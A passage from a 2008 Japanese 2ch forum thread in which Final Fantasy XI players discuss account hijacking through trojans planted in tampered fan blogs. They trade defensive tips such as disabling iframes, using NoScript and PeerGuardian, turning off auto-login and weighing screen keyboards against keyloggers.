764 名前:既にその名前は使われています [2008/03/25(火) 17:10:17.90 ID:yuQmWgMr]
5)面倒ですが毎回パスを入力する羽目になります。そん時もスクリーンキーボードつかえばなお安心!

6)IPフィルターもかければモアベター。リネージュ資料室見て手順読み飛ばさずにPG2導入しましょう。

7)IFRAMEを使った罠が多い!IEの設定を変えてIFRAMEを無効にしよう。
  ツール→インターネットオプションを選択。
   ・セキュリティタブをクリックし→「レベルのカスタマイズ」ボタンをクリック。
   ・ずーっと下の方にスクロールさせていくと、「その他」の項目に
    「IFRAMEのプログラムとファイルの起動」という項目がありますので
    「無効にする」を選んでOKボタンをクリック。

ベターなアンチウィルスソフトとかは諸説あるから好きに決めましょう。何でも無いよりマシ!
(どれがいいか悩んだらカスペルスキー入れとけ新種の対応が早いらしい)
○○してるから大丈夫だよね!ってひとはヤバイです。
すなわちこれやってるから安心ってわけでもないです。ウィルスや散布方法は日々変わっています。常に警戒を怠らないでね!
他にもマメにパスを変えるとか色々あるよ〜自衛しよう!

765 名前:既にその名前は使われています [2008/03/25(火) 17:11:25.81 ID:erjVAm8i]
パスワードファイルって、何ていうファイル名?
ファイル抜き取るにしても、ファイルの場所とファイル名がわからないとダメだよな?
どのタイミングで抜き取られてんの?

766 名前:765 [2008/03/25(火) 17:16:26.37 ID:erjVAm8i]
事故解決

DLトロイ→アカハック用トロイ→パス抜き、か。
手がこんでやがるなぁ。

767 名前:既にその名前は使われています [2008/03/25(火) 17:17:09.80 ID:GjK/r663]
ゲストログインを ON/OFF ユーザーが任意で切替えできるようにしろよ。
もちろん設定できるのは、メインユーザーのみで。

768 名前:既にその名前は使われています [2008/03/25(火) 17:18:38.71 ID:wauNaTUd]
回線2本引いて一本をFF専用線にしてFFをインスコしたPCに直差し。
そのPCではアンチウィルスソフトやWindowsのアップデート以外での
ネットアクセスをしないようにすれば完璧かな?

ウチは通常電話回線とBフレッツの2回線でやってるから通常電話回線をADSLにでも
すれば行けそうだ。
イーモバイルのホームアクセスなら一ヶ月1980円だし、それで安全になるなら
安いもんかもしれん。

769 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:21:21.86 ID:F7ukR53f]
>>768
FF11はPS2 or xboxでプレイ
PCはフォーマットからOS再インスコして、FF11のIDやパスはいっさい入力しない

の方が安上がりじゃない?2回線のランニングコスト次第かな?

770 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:23:58.71 ID:1T0NGHDd]
jbbs.livedoor.jp/game/43616/
いらないだろうけど作った( ^ω^)管理はしないお



771 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:24:02.10 ID:BKM8BC0w]
>>768
BフレッツはPPPoEセッション2つはれるんだが……。

772 名前:既にその名前は使われています [2008/03/25(火) 17:25:38.22 ID:EH31oboY]
>>771
だったら複数セッション同時接続可能なルーター晒せって証拠だよ

773 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:28:49.01 ID:BKM8BC0w]
>>772
複数セッションはれるルータもあるけど、必須じゃない。
ハブで分配してルータ2個でおkだから。

774 名前:既にその名前は使われています [2008/03/25(火) 17:29:01.80 ID:oKb27/UH]
うちで使ってる数年前のBA8000PROでさえできるし
今時のルーターならできるんじゃないの?

775 名前:既にその名前は使われています [2008/03/25(火) 17:29:22.77 ID:b9pEtjv5]
FireFoxにNoScript入れてみた
めんどくさそうと思ってたけどホワイトリスト形式で信頼できるサイトだけ許可すればいいんだな、これはいいわ

あと欲を言うと
FireFoxだとジュゲムのブログのデザインがおかしくなるのさえなんとかなればなあ

776 名前:既にその名前は使われています [2008/03/25(火) 17:30:22.72 ID:GbUm+hdk]
うちの3kで買ったルータもできる

777 名前:768 [2008/03/25(火) 17:30:44.39 ID:wauNaTUd]
もう物理的に切り分けないとダメかもしれん、と768を書いた。

773の接続に興味がある。
中途半端な知識しかない俺に教えておくれい。

778 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:33:54.51 ID:NxOTbSzI]
垢ハック多発で卒業者多数。
垢ハックに喰らってなくてもフレやらが喰らってFFいる理由もなくなり
雪崩のように引退。

RMTの供給は増えるだろうが需要が少なくなってFF終了。
結局自分にツケが回ってくるって気づかないのかな業者はw




779 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:35:44.40 ID:BKM8BC0w]
>>777
現状はNTTの光終端とルータのWANポート直結なってると思うけど、
その間にスイッチングハブかまして、そこに新しいルータをつなぐだけ。
もちろん、ISP(プロバイダ)契約は2個になるけど、足回り回線は1本ですむ。

ちなみに、地域にもよるけど、1個目のルータを起動してから、
すぐに2個目のルータを起動するとつながらないことがある。
その場合は15分くらいまってから2個目を起動するとたいていはつながるっぽい。

780 名前:既にその名前は使われています [2008/03/25(火) 17:36:36.65 ID:eeYPisjz]
カスペルスキーの試用版でも入れとけば少しは被害なくなるのに
何で駄々漏れのクソルスバスターなんか入れてるわけ?



781 名前:既にその名前は使われています [2008/03/25(火) 17:38:08.53 ID:EH31oboY]
>>780
官公庁で一杯使われてて名前を知ってたから自分のパソコンにも入れた公務員のパパを持つ子が(ry

782 名前:既にその名前は使われています [2008/03/25(火) 17:38:36.27 ID:AYjZnBwT]
>>778
食い尽くしたら次の獲物にいくだけだから、そこまで考えるわけない

783 名前:既にその名前は使われています [2008/03/25(火) 17:39:43.30 ID:r14sYMpC]
スクリーン キーボードを起動すると下記の画面が表示されます。
「スクリーン キーボードは四肢に障害がある方を補助する基本的な機能を提供します〜」
もともとセキュリティ目的で提供された機能ではありません。
マウスやキーボードの操作を記録するソフトで調べたところ
下記のように「マウスを使用した位置座標」と「入力したキーの内容」の両方が記録されます。

☆テンキーを使って「123」と入力した場合
 マウス左クリック,X座標,y座標
 キーボード_テンキー1,クリック
 マウス左クリック,X座標,y座標
 キーボード_テンキー2,クリック
 マウス左クリック,X座標,y座標
 キーボード_テンキー3,クリック

784 名前:既にその名前は使われています [2008/03/25(火) 17:39:58.59 ID:eeYPisjz]
>>782
横山三国志のイナゴを思い出した


785 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:39:59.62 ID:r14sYMpC]
☆メインキーボードを使って「123ABC」と入力した場合の例
 マウス左クリック,X座標,y座標
 メインキーボード1,クリック
 マウス左クリック,X座標,y座標
 メインキーボード2,クリック
 マウス左クリック,X座標,y座標
 メインキーボード3,クリック
 マウス左クリック,X座標,y座標
 メインキーボードA,クリック
 マウス左クリック,X座標,y座標
 メインキーボードB,クリック
 マウス左クリック,X座標,y座標
 メインキーボードC,X座標,y座標

ということは、キーロガーソフトに対するセキュリティー上の効果は全くないと考えていいと思います。

786 名前:既にその名前は使われています [2008/03/25(火) 17:40:27.04 ID:CE2JkWXV]
今回「たまたま」カスペの対策早かっただけだろ。
対策より前に感染してた可能性だってあるしな。
スクエニが言うような自衛してたって抜かれるものは抜かれる。



787 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:40:53.24 ID:BKM8BC0w]
カスペは製品版は高いと思う……。

# とかいいつつ9台分ライセンス契約してる漏れは徳島信者。

788 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:40:59.45 ID:iZibIXDg]
>>782
正式サービス開始したばかりのパンドラサーガの狩場が
すでに中華ばっかだしね。既にBOTかもしれんが。

789 名前:既にその名前は使われています [2008/03/25(火) 17:42:15.29 ID:oKb27/UH]
>>778
他人の土俵で暴れるだけだから損失なんて微々たるもんだろうしね。
次のテーマパークに引っ越すだけだよ。

790 名前:既にその名前は使われています [2008/03/25(火) 17:44:00.53 ID:vED0t+l4]
>>763
すまん、3)のパスワードってのは、
POLのパスワード?
それともメンバーパスワード?



791 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:44:14.62 ID:eeYPisjz]
銀行とかでネット振込みとかする場合に暗号表使う奴あるよな?
あれを使えばいいんじゃないの?

登録住所に書留で送って不正な住所で登録している奴は削除っていう方向で。
業者なんかどうせペンギン村なんだから消しとけばいい

792 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:44:21.31 ID:OoZjY94u]
日本人は泣き寝入り好きだなw集団訴訟すれば話題になって■に大打撃あたえれるのにw

793 名前:既にその名前は使われています [2008/03/25(火) 17:48:26.86 ID:r14sYMpC]
>>763-764

スクリーンキーボードについて色々調べてみたが無意味っぽいんですが。
hxxp://d.hatena.ne.jp/RoboForm/20060922/p1

794 名前:768 [2008/03/25(火) 17:48:33.60 ID:wauNaTUd]
>>777
サンクス。
なるほど、あそこにハブをかませるのね。
ルーターの設定は、それぞれ通常通りにやればいいのかな?(別々のISPの設定入力)

安めのルーターと安いISPで回せば回線一個増やすより安上がりかー。
でも安全第一。
ここまで騒がれると、さすがに怖くなってくるよね。

795 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:48:55.09 ID:7b1K7Xyr]
みんながパスを手入力に変えれば、間違いなくトロイセットの中にキーロガーも混ぜてくるんだろうな

796 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:49:12.24 ID:oGzYtkTi]
>>792
ギルやアイテム、キャラクタなんかのデータは■eのモノだし
具体的にはどういう理由で訴えるんだ?

797 名前:既にその名前は使われています [2008/03/25(火) 17:54:38.91 ID:gLU6AqT5]
なぁ、ここみると「1万ページ以上改竄」ってなってるのに9個しか報告がないのは何故なんだぜ?
internet.watch.impress.co.jp/cda/news/2008/03/13/18800.html

■改竄被害ブログ一覧
 黒猫奮闘記 (インラインフレーム・1回改竄され修正済み)
 ぺってん (インラインフレーム・1回改竄され修正済み)
 戦士スキー(インラインフレーム・2回改竄され修正済み)
 某青魔道士(インラインフレーム・2回改竄され閉鎖)
 ペコろぐ。(Javaスクリプト・1回改竄され修正済み)
 ヴァナモンblog(Javaスクリプト・1回改竄され修正済み)
 ある黒魔道士の軌跡(インラインフレーム・1回改竄され修正済み)
 FF11初心者の館(Javaスクリプト:改竄されてウィルスまきちらし中)
 Lostfr【誰か】かまって【くれませんか?】(Javaスクリプト・1回改竄され修正済み)

798 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 17:55:45.44 ID:iZibIXDg]
1万ページのFC2ブログってわけじゃないでしょ。
トレンドマイクロなどの改ざん含めた件数。

799 名前:既にその名前は使われています [2008/03/25(火) 17:56:42.37 ID:E63NChrz]
r14sYMpCはスクリーンキーボード使って欲しくない業者ですか?

800 名前:既にその名前は使われています [2008/03/25(火) 17:56:58.08 ID:/z/ByKzc]
>>796
スクエニは被害者だから
加害者不詳で不正アクセス防止法じゃないかね
ノードログは残ってるだろうから端末追跡は可能なはずだが
日本では集団訴訟とかが一般的じゃないから泣き寝入りが一般的

スクエニに打撃あたえるなら株式掲示板とかで
アタックされまくってますよと喚き立てるのがいいんじゃないかね



801 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:04:04.74 ID:OoZjY94u]
IT社会の今、企業の個人情報パスワード等のセキュリティ対策、24時間窓口等は当然の責任。訴訟だーww
罪状なんかなんでもいいww話題にさえなればww

802 名前:既にその名前は使われています [2008/03/25(火) 18:04:25.48 ID:PeBeQGP1]
ハッキン goo!

803 名前:既にその名前は使われています [2008/03/25(火) 18:04:57.43 ID:r14sYMpC]
>>799
業者じゃないよ。

調べたら金融系では既に試された後で、それに対応する形で新種の
ロガーがもう出たっぽいのよ。
んで結局ワンタイムパスワード方式に移っていってるらしい。
スクリーンキーボード、キーロガーあたりでぐぐってくれ。

804 名前:268 [2008/03/25(火) 18:05:26.25 ID:vhRd0OHh]
自キャラの持ち物をばざってるキャラが発見されました。
フレから教えてもらったのですが何とも言えない気持ちです。
あんこくwってばれるものを売らないで!!!

805 名前:既にその名前は使われています [2008/03/25(火) 18:06:39.32 ID:oKb27/UH]
>>802
不覚にもじわりときてしまった・・・

806 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:07:42.77 ID:KlTCqiN9]
パスワードがファイルとして保存されてるなら、

1.そのファイルをどこかに移動させ、
 その場所を自作のプログラムに記録しておく。
2.自作のプログラムは起動されると、
 パスワードファイルを正しいフォルダに移動する。
3.この状態でPOLを起動してログイン。
4.ログインできたら自作のプログラムを終了する。
 同時にパスワードファイルを別の場所に移動させる。

こんなプログラムを作るのはどうよ?
キーボード打つより楽だし、キーロガーも利かないぞ。
移動先まで突き止められたらアウトだけど……

807 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:08:01.93 ID:oGzYtkTi]
>>801
パスは■eの鯖から抜かれたもんじゃないし
なんでも良いなら具体的になんか出してみて

808 名前:既にその名前は使われています [2008/03/25(火) 18:09:02.89 ID:hpQdjsfd]
safariは早速脆弱性が発見されてるなw
垢ハックに直接関係あるものじゃないが、由来が由来だから安全だ!と
盲信したら痛い目に遭いそうだ

809 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:13:18.61 ID:olj5CvgD]
偏った意見もあったけどいままで真面目なスレ進行だったのだが
こうもアカハックスレが乱立するとダメダメ感が



810 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:13:24.36 ID:7AcvCmxE]
>>806
それだけなら、batファイルだけでできるな
(とりあえず移動じゃなくてリネームにした
移動にするならmove使うだけだが)

ren テンポラリファイル名 パスワードファイル名
pol.exe
pause
ren パスワードファイル名 テンポラリファイル名

これで十分かどうかはわからんが



811 名前:既にその名前は使われています [2008/03/25(火) 18:13:26.54 ID:r14sYMpC]
例えばこれ2年以上前の記事なんだけど

hxxp://itpro.nikkeibp.co.jp/article/NEWS/20050826/220184/
警戒してる人多いだろうから重要なとこだけ転載しとくよ。

今回確認されたのは,ソフトウエア・キーボード用のキーロガーといえるマルウエアである。
同団体が「Screen Scraper」と呼ぶこのマルウエアは,ユーザーのパソコンに入り込むと,
ソフトウエア・キーボードのウインドウが表示されるのを待つ。そして,そのウインドウが
アクティブになると,マウスがクリックされるたびにパソコン画面をキャプチャする。
スクリーン・ショットからは,ユーザーがソフトウエア・キーボードのどのキーをクリック
したのかが分かるので,パスワードなどを盗むことができる
(写真は,APWGのレポートに掲載されたスクリーン・ショットの一例。ほかにも数例掲載している)。

812 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:14:34.25 ID:eeYPisjz]
不正アクセス防止法だっけ?
あれで訴えるしかないんじゃないの
警察は被疑者不詳のまま書類送検できるみたいだし。

813 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:15:16.31 ID:iVexBhau]
てす

814 名前:既にその名前は使われています [2008/03/25(火) 18:15:34.36 ID:asyyJnZw]
PG2の履歴でコリアやChinaをFFしかしてない時間にブロックしてるんだけど、なんか入ってるのかな?
FFは全画面でやってます

815 名前:既にその名前は使われています [2008/03/25(火) 18:15:37.62 ID:I4zc7BR7]
>>797
こっちで独自で探して解ってる数がこんだけ。
で、EQ2の会社独自で調べたのが1万。
つまり、見方によってはまだ何億とHPにウイルスにかかっている可能性があるから気をつけてねー
…って話しなのに、それを読めないおまいはもうネット繋ぐな。

816 名前:既にその名前は使われています [2008/03/25(火) 18:16:33.21 ID:kg+URtZD]
アクセスしたサイトのWebサーバーが国外にある場合はどうなるんやろ

817 名前:既にその名前は使われています [2008/03/25(火) 18:17:29.53 ID:kg+URtZD]
>>814
自動アップデート切ったら出なくなったような気がする
間違ってたらスマソ

818 名前:既にその名前は使われています [2008/03/25(火) 18:17:55.34 ID:kg+URtZD]
入ってくるほうか^^;

819 名前:既にその名前は使われています [2008/03/25(火) 18:18:49.41 ID:asyyJnZw]
>>817
ありがとー
今度試しとく

820 名前:既にその名前は使われています [2008/03/25(火) 18:23:09.00 ID:I4zc7BR7]
>>809
なんかアカハックスレによる掲示板ハックになりつつあるな…
まあ、まともに対応出来る奴はここ中心で動いているだろうから、
「何時ものネ実」で軽くスルーでいいんでない?

てか、これがv速とかに跳び火してくれればいいんだけど、基本ここの人間チキンだからなあ…



821 名前:既にその名前は使われています [2008/03/25(火) 18:23:31.21 ID:b1jIPTS8]
PG2の初期設定でファイル、peerguardian.sourceforge.net/lists/なんたら.php
のなかにSQUARE拒否る設定はいってるぽい

上記の設定利用しつつFF出来るよう、Whoisとかぶっちゃけよくわからんが
以下の内容のtxt読み込んで許可したら通った
SQUARE ENIX CO,LTD:61.195.56.0-61.195.59.255
SQUARE ENIX CO,LTD:202.67.48.0-202.67.63.255
SQUARE ENIX CO,LTD:61.195.60.0-61.195.63.255
SQUARE ENIX CO,LTD:219.117.144.0-219.117.159.255

822 名前:既にその名前は使われています [2008/03/25(火) 18:23:41.74 ID:J6HuyFWS]
もしも、Firefox+NoScriptでもホワイトリスト入れちゃったサイトが改竄されたら
オワタ?

823 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:23:58.44 ID:qDsKY6Zb]
カスペのオンラインスキャンやってみようと思ったんだけど
「データベースをアップロードします[○%]」
てのがいつ終わるのか検討もつかないくらい進まないんだがw

試用版DLして検索したほうが早いのかすら?

824 名前:既にその名前は使われています [2008/03/25(火) 18:24:09.44 ID:OkyXvjGD]
昔のドラクエみたいに、銀行にギル預けれるようなシステムとかあったらな。

825 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:24:43.39 ID:SKv3thFQ]
fc2ブログ主だが、パスかけて非公開なら安全と思ってよい?
身内にだけ公開してたので、ブログスタート時からずっとパス設定してあるプライベートモードなんですが。


826 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:25:52.80 ID:iZibIXDg]
>>825
FC2ブログのテンプレ改竄ってことは管理画面に入れるってことなんすよ。

827 名前:既にその名前は使われています [2008/03/25(火) 18:26:05.52 ID:dSjKWV+T]
>>822
そりゃそうだろw

828 名前:既にその名前は使われています [2008/03/25(火) 18:28:49.03 ID:iK1zczLu]
>>811
どんな対策も、それをやっとけば100%安全てものはないんだ。

だから効果がある対策を複数やるのが重要だ。

スクリーンキーボードは、対応されたキーロガーでない限り、有効に働いてくれる。

スクリーンキーボードだから安心、ではなくて対抗策の1つとして使うのは全然ムダ
じゃない。
ただ危険な点を指摘するのも意味があるので、君の言ってることも正しい。

829 名前:既にその名前は使われています [2008/03/25(火) 18:29:44.76 ID:4rU7fOzS]
乱立しすぎて情報を正しく拾いきれない人が増えていそうだ・・・
警告にはなっているけど少し悲しいな

830 名前:825 mailto:sage [2008/03/25(火) 18:29:49.60 ID:SKv3thFQ]
まずいのかΣ(゜Д゜;≡;゜д゜)
サンクス。
とりあえず閉鎖してからいろいろ調べてみる。
ウィルスとかスクリプトとかサパーリな人なので、別ブログをさがすことになりそうだけど。



831 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:30:43.01 ID:zmnAru99]
>>822
fx用の罠が仕掛けられたらアウトー!

まぁあんまりないだろうが

832 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:31:17.55 ID:gCK0NHd/]
ID Managerってどうなのコレ?垢ハックに効果あるのでしょうか

833 名前:既にその名前は使われています [2008/03/25(火) 18:31:53.31 ID:b1jIPTS8]
>>832
それ、単にID一括管理するだけw

834 名前:既にその名前は使われています [2008/03/25(火) 18:34:00.19 ID:eytJR0sf]
サンディの思いとは正反対にコミュニティ縮小が進みそう

835 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:34:16.48 ID:MjQNpCSt]
Webマネーってクレジットカードで買える所ある?

836 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:35:27.92 ID:49rjbgT+]
スレ乱立=祭りor大変な事になってるという認識になり
垢ハックに無関心だった人も少しは関心を持ち対策に乗り出すんじゃないだろうか?
あとはきちんとした情報を拾えるかが問題ではあるけど、
垢ハックに対して危機感を持ってくれれば被害は減少するはず

837 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:35:57.58 ID:7b1K7Xyr]
>>835
ttp://www.webmoney.jp/

838 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:37:10.16 ID:KlTCqiN9]
>>829
このスレだって
「ネット上のセキュリティ一般」と「FFXIの垢ハック対策」
が混在してるからな……不可分っちゃ不可分だけど。

839 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:37:11.14 ID:MjQNpCSt]
>>835
オンラインチャージ見つけた。
スイカみたいな感じで入れられそうだ。

840 名前:既にその名前は使われています [2008/03/25(火) 18:40:09.57 ID:UPsh+85i]
>>829
乱立してるスレにこの本スレの誘導貼って、
最終的には本スレに収縮させていければいいかも。
しばらくは知ってもらうために乱立させといて。

乱立スレ開いてないんで、すでにそういうことしてるならスマン



841 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:40:23.68 ID:gCK0NHd/]
>>833
ありがとう これもダメ、スクリーンキーボードもダメとなるともうどうしたものやら

842 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:41:58.07 ID:OoZjY94u]
■訴訟これで勝てるw

(不正アクセス行為を助長する行為の禁止)
第四条  何人も、アクセス制御機能に係る他人の識別符号を、その識別符号がどの特定電子計算機の特定利用に係るものであるかを明らかにして、
又はこれを知っている者の求めに応じて、当該アクセス制御機能に係るアクセス管理者及び当該識別符号に係る利用権者以外の者に提供してはならない。
ただし、当該アクセス管理者がする場合又は当該アクセス管理者若しくは当該利用権者の承諾を得て行う場合は、この限りでない。
(アクセス管理者による防御措置)
第五条  アクセス制御機能を特定電子計算機に付加したアクセス管理者は、当該アクセス制御機能に係る識別符号又はこれを当該アクセス制御機能により確認するために用いる符号の適正な管理に努めるとともに、
常に当該アクセス制御機能の有効性を検証し、必要があると認めるときは速やかにその機能の高度化その他当該特定電子計算機を不正アクセス行為から防御するため必要な措置を講ずるよう努めるものとする。

843 名前:既にその名前は使われています mailto:age [2008/03/25(火) 18:42:00.95 ID:rvQA3x19]
とりあえずハック組織ひとつどうにかしないと、やばいな。
24時間順番にキャラ掃除してるから、まずは、自動きって、パス変更を、コピペで色んなとこに流さないとな

844 名前:既にその名前は使われています [2008/03/25(火) 18:42:03.14 ID:EH31oboY]
>>841
javaとiframeオフにするだけで99%防げんのにそれ以上なにするってのw

845 名前:既にその名前は使われています [2008/03/25(火) 18:42:17.62 ID:UPsh+85i]
とりあえず俺みたいなPCのこととかにあまり詳しくないやつは
このスレ読んでもよくわからないことが多いのが余計不安でしょうがない。

余力ある人いたら、PC版プレイヤーとPS2・xbox版プレイヤーにわけて
どういう対策ができるか、みたいなテンプレがほしいなあ・・・

846 名前:既にその名前は使われています [2008/03/25(火) 18:45:02.48 ID:z2JvlIkt]
「FINAL FANTASY XI 散策日記(goemonas.blog69.fc2.com)」もハックされたっぽい。
今更だが。


847 名前:既にその名前は使われています [2008/03/25(火) 18:45:15.40 ID:pn98/92E]
>>841
お勧めは課金停止してHDDフォーマット、何らかの納得出来る対策が始まったら復活。

どうでも良いけれどNAとかとサービスの質が違うなら
同じワールドで一緒に遊ぶ気になれない。
過疎ッても居ないのに混合鯖にするのはどう考えても間違っている。
しかもそのせいで垢ハック上等な国々から接続されるのも仕方がないってどういう事よ?

848 名前:既にその名前は使われています [2008/03/25(火) 18:46:02.91 ID:oKb27/UH]
>>845
>>1

849 名前:既にその名前は使われています [2008/03/25(火) 18:49:04.08 ID:b1jIPTS8]
頼むからJavaって言うなよ気持ち悪いw

850 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:49:21.49 ID:oGzYtkTi]
>>842
「明らかにして」ないし「提供して」ない



851 名前:既にその名前は使われています [2008/03/25(火) 18:50:13.84 ID:YIQzpj2X]
しかし見事にFC2ばっかなんだな

852 名前:既にその名前は使われています [2008/03/25(火) 18:50:50.91 ID:EH31oboY]
>>849
なまくらなんちゃって技術者乙
IEのオプションにはJavaって書いてあるよww

853 名前:既にその名前は使われています [2008/03/25(火) 18:51:36.81 ID:CE2JkWXV]
>>844
iframeオフって具体的にどーすんだ?

854 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:51:57.99 ID:OoZjY94u]
仮想世界の資産を守る努力を怠って犯罪を助長黙認幇助しているw
不正アクセス行為から防御するため必要な措置を講ずるよう努めていないw

855 名前:既にその名前は使われています [2008/03/25(火) 18:52:15.39 ID:UPsh+85i]
>>853
>>764みて俺いまオフにした

856 名前:既にその名前は使われています [2008/03/25(火) 18:52:55.82 ID:JIu1wKVr]
ttp://www.mozilla.com/en-US/firefox/
Fire Fox をインストールする。インストール時にDOM Inspectorを導入する。

AdBlock PlusとNoScriptのAdd-onをインストールする。
ttps://addons.mozilla.org/en-US/firefox/addon/1865
ttps://addons.mozilla.org/en-US/firefox/addon/722

ここからAdBlockPlusの追加フィルターを導入。導入したいフィルターのSubscribeをクリック。
ttp://adblockplus.org/en/subscriptions

お勧めは、この三つ
ABP Tracking Filter
EasyList
Fanboy's List

NoScriptはデフォルトでスクリプトを全部禁止するため、サイト観覧に支障をきたす場合がある。
正常に見れない場合は、サイト上でマウスの右ボタンをクリックすすると、一番下にメニューがでて
どのスクリプトを実行するか選択できる。信頼できるスクリプトは"Allow"
たぶん実行しても安全と思うのは、"Temporarily Allow"、ただしグレーなのは放置すること。
英語のOSでやってるので、日本語は良く判らないが、たぶん同じだと思って書いて見た。

857 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:53:17.99 ID:oGzYtkTi]
>>852
そうやってJAVAとJavaScriptを混同するからつっこまれるんだろw

858 名前:既にその名前は使われています [2008/03/25(火) 18:53:26.76 ID:CE2JkWXV]
>>855
すまん、ありがとう。
読み飛ばしてたわ。

859 名前:既にその名前は使われています [2008/03/25(火) 18:54:11.28 ID:ZC7LgN8X]
>>852
そうだね、スクリプトは切ってとは言ってないものねw

860 名前:既にその名前は使われています [2008/03/25(火) 18:54:27.61 ID:b3cyylEY]
PS2でやってるんだけど、PCで公式のフレンドリストアプリというソフトを使っています。
このツールからハックされる可能性はあるんでしょうか?



861 名前:既にその名前は使われています [2008/03/25(火) 18:54:40.40 ID:EH31oboY]
>>853
ツールタブからインターネットオプション→セキュリティタブ→
カスタム内レベルのカスタマイズボタン
セキュリティの設定ウィンドウ内をスクロールしてくと
その他
  IFRAMEのプログラムとファイルの起動
   ○ダイアログを表示する
   ◎無効にする
   ○有効にする

ね?

862 名前:既にその名前は使われています [2008/03/25(火) 18:56:18.64 ID:Ua1VAnox]
>>852
JavaとJavaScriptの区別もつかないゆとり乙

863 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:57:01.92 ID:OoZjY94u]
■を不正アクセス禁止法で訴えようw明らかにアクセス管理者による防御措置不十分ww

864 名前:既にその名前は使われています [2008/03/25(火) 18:57:35.66 ID:EH31oboY]
>>862
分かりやすく解説してくれよw

865 名前:既にその名前は使われています [2008/03/25(火) 18:57:57.89 ID:eytJR0sf]
>>860
POLパスワードを保存できるならローカルのどこに保存しようが
同じこといえるんじゃない?気をつけたほうがいいと思う

866 名前:既にその名前は使われています [2008/03/25(火) 18:58:14.68 ID:JIu1wKVr]
IEだと、スクリプトのオンかオフしかなくて、部分的に実行できないから不便。
なのでFireFoxとNoScriptお勧め。

867 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:58:16.53 ID:KlTCqiN9]
>>860
そのアプリの起動時にPOLパスワードを入れるよう要請されるなら、
抜かれる可能性はゼロじゃない。
ハッキングツールがそのアプリに対応していたり、
そのアプリがFFXI本体と同じ場所に同じ形式で
パスワードを保存してたりすると、抜かれる可能性は更に上がる。

868 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 18:59:55.66 ID:gCK0NHd/]
お気にいりの動作をIE7と全く一緒にできれば火狐乗り換えたいんだが・・・
使いにくくてかなわん。

869 名前:既にその名前は使われています [2008/03/25(火) 19:01:03.16 ID:eytJR0sf]
使いにくい
⇒使い慣れていない


870 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 19:01:32.02 ID:OoZjY94u]
XP IE6のセットが一番メジャーすぎて危険w
vista IE7か
XP IE7がいいかんじw



871 名前:既にその名前は使われています mailto:sage [2008/03/25(火) 19:02:44.41 ID:MVQk5zHY]
>>849
JAVA=JAVAアプレット。JRE入ってないと動かない。
JavaScript=ウインドウだしたりジャンプしたりするやつ。
中二病技術者がajaxとかいって使いたがる。
IEでは「アクティブスクリプト」と表記される。

アクティブスクリプトをoffにすると、グーグルとかアマゾンとかで
糞みたいなことになる。

872 名前:既にその名前は使われています [2008/03/25(火) 19:03:32.64 ID:qjtmYPzf]
>847
>お勧めは課金停止してHDDフォーマット、何らかの納得出来る対策が始まったら復活。
最高の防衛策ですな
漏れもこの防衛策を導入しようw

873 名前:既にその名前は使われています [2008/03/25(火) 19:03:52.83 ID:JIu1wKVr]
>868
PlainOldFavoritesマジおすすめ。
ttps://addons.mozilla.org/en-US/firefox/addon/668
IEのお気に入りをそのままFireFoxで使う。英語版だけどね。

874 名前:定期コピペ [2008/03/25(火) 19:05:45.52 ID:gV659xLe]
100%ウィルスを防ぐ方法は無い!だが極力防御を固めてスキを与えなくすることは出来る!

1)今すぐWindowsUpDateしましょう。今すぐ。★「あなたのPCは最新ですぅ」と表示されるまで何度もやろう。
  XP・Vista:スタート→すべてのプログラム→Windows Update
  他:知らん

2)今すぐアンチウィルスソフトを導入&最新のバージョンに。ウィルススキャンもしよう。今すぐ。

3)1、2を終えたらPOLの自動ログインを切ってPOLパスを毎回手で入力するようにしよう。パスも変えてしまうと良いですね。
 ★「メンバーズパスワード」は他人にPC触られたとき用のパスワードなのでこれは関係ないです。間違えんなよ!
  【手順】
  1.自動ログイン設定をOFFにする
  2.パスワードを変更する
  3.以降、パスワードは手動入力してPOLにログインする

4)その際スクリーンキーボードを使うとGOOD!キーボードは非推奨です。
  ※スタート→すべてのプログラム→アクセサリ→ユーザー補助→スクリーンキーボード

875 名前:定期コピペ [2008/03/25(火) 19:06:04.97 ID:gV659xLe]
5)面倒ですが毎回パスを入力する羽目になります。そん時もスクリーンキーボードつかえばなお安心!

6)IPフィルターもかければモアベター。リネージュ資料室見て手順読み飛ばさずにPG2導入しましょう。

7)IFRAMEを使った罠が多い!IEの設定を変えてIFRAMEを無効にしよう。
  ツール→インターネットオプションを選択。
